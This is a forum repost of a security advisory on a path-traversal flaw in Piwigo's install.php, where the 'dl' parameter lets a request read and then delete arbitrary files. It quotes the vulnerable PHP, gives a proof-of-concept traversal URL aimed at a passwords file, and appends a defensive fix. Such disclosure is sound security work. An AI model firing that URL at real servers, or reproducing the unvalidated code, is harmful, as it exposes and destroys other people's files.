China Network Penetration Testing Alliance

Title: Piwigo Arbitrary File Disclosure and Arbitrary File Deletion Vulnerability

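Author: admin    Time: 2013-3-14 20:15
Piwigo is a photo gallery script written in PHP.

Piwigo 2.4.6 and other versions do not properly validate the value of the 'dl' parameter of the install.php script, which results in security vulnerabilities. An attacker can exploit them to view arbitrary files on the affected computer and to delete arbitrary files within the context of the affected application.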
====================================================================
/install.php (lines 113-124):
-------------
// 'dl' comes straight from the query string and is appended to the path;
// nothing strips '../' sequences or confines the result to the data directory.
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename); // file contents are sent to the client (disclosure)
  unlink($filename);                 // the same file is then removed (deletion)
  exit();
}
====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
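
An added example, not from the original post and not the vendor's patch: one way to constrain the 'dl' value before the read and unlink() in the install.php excerpt, so that both can only touch a file directly inside the data directory. The function name resolve_download, the token allow-list and the demo directory and inputs are assumptions made for illustration.

```php
<?php
/**
 * Resolve a user-supplied download token to a file inside $dataDir.
 * Returns null if the token is malformed or the path escapes the directory.
 * (Hypothetical helper; the allow-list assumes legitimate tokens are short
 * alphanumeric strings.)
 */
function resolve_download(string $dataDir, string $token): ?string
{
    // Allow-list: no path separators, dots or NUL bytes can get through.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $token)) {
        return null;
    }
    $base = realpath($dataDir);
    if ($base === false) {
        return null;
    }
    // realpath() canonicalises '..' and symlinks; it returns false if absent.
    $path = realpath($base . DIRECTORY_SEPARATOR . 'pwg_' . $token);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Defence in depth: the canonical path must sit directly in $base.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary data directory holding one legitimate file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pwg_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'pwg_abc123', "<?php // config\n");

// Constructed inputs: one valid token, the value from the advisory URL,
// a backslash variant, a NUL-byte variant and an empty value.
$cases = ['abc123', '../../../../../../lio_passwords.txt',
          '..\\..\\example.txt', "abc123\0.txt", ''];
foreach ($cases as $dl) {
    $resolved = resolve_download($dir, $dl);
    printf("%-45s => %s\n", json_encode($dl), $resolved === null ? 'rejected' : 'served');
}

// Clean up the demo directory.
unlink($dir . DIRECTORY_SEPARATOR . 'pwg_abc123');
rmdir($dir);
```

Only the path returned by such a check would be passed to file_get_contents() and unlink(); a null result means the request is refused before either call.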